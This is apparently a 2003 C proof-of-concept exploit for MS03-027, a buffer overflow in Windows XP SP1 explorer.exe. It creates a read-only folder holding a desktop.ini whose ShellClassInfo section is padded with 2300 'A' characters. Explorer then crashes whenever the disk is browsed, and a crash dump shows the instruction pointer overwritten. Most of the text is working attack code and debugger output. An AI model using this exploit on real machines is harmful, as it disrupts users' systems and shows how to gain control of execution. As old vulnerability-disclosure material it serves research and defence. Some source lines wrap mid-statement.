/*

MS03-027 - Buffer Overflow in explorer.exe (ShellClassInfo ) - Proof of Concept
Tested only against: Windows XP SP1

Found by aT4r (at) 3wdesign (dot) es [email concealed]

Saludos a:
- #Haxorcitos@efnet= { "Tarako", "Croulder", "Drakar" , "[back]","tyr" }:
- #localhost and #darknet

Usage: just execute this file.
This code will crash your explorer every time you try to
browse yourharddisk
execute this program again to delete the evil file ;-)

(3ec.464): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00410041 ebx=0012aca8 ecx=77e5e1c4 edx=002f0000 esi=00121b70
edi=000ece90
eip=00410041 esp=0177dfb0 ebp=00410041 iopl=0 nv up ei pl zr
na po
nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00010246
00410041 ?? ???

3W Design Security 2003. http://www.3WDesign.es/
*/

#include <direct.h>
#include <stdio.h>
#include <windows.h>
#include <sys/stat.h>

#define BUFF 2300
void main(){

char path[256];
char evil[BUFF+1]="";
FILE *bof;
struct stat st;
printf("\n . .. ...: \tBuffer overflow in explorer.exe\t\t:... ..
.\n . ..
...: \tProof of Concept (aT4r (at) 3wdesign (dot) es [email concealed])\t:... .. .\n\n");
strcpy(path,"\\aT4r[at]3WDesign.es Security");
mkdir(path);
SetFileAttributes(path,FILE_ATTRIBUTE_READONLY);

strcat(path,"\\desktop.ini");
if (stat(path,&st)==0)
{ remove(path); exit(1);}//just execute this program twice
to remote this
file :P
bof=fopen(path,"w");
fputs("[.ShellClassInfo]\n",bof);
memset(evil,'A',BUFF);
fputs(evil,bof);
fclose(bof);
printf("evil file: %s Created. Try to browse your Harddisk
O:-)\n",path);

}